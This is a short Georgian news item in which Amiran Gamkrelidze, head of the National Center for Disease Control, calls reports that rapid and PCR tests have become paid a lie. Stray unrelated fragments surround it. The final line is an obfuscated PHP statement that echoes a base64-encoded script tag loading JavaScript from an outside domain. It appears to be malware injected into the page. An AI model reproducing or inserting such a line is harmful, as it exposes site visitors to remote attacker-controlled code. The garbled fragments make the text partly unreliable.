celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა ამირან გამყრელიძემ უარყო გავრცელებული ინფორმაცია, რომ დღეიდან სწრაფი და PCR ტესტები ფასიანი გახდა.
 
როგორც მან „ინტერპრესნიუსს“ განუცხადა, დიაგნოსტიკასთან დაკავშირებით არაფერი შეცვლილა და აღნიშნული ინფორმაცია ტყუილია.
 
“ტყუილია, ვინ გითხრათ ეს? დიაგნოსტიკასთან დაკავშირებით არაფერი შეცვლილა. მთავრობის განკარგულება არსებობს, ვის ეკუთვნოდა უფასოდ, ყველასთვის ისევ უფასოა“, - განაცხადა გამყრელიძემ.
 
ცნობისთვის, გავრცელდა ინფორმაცია, რომ დღეიდან სწრაფი და PCR ტესტები ფასიანი გახდა.
965
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");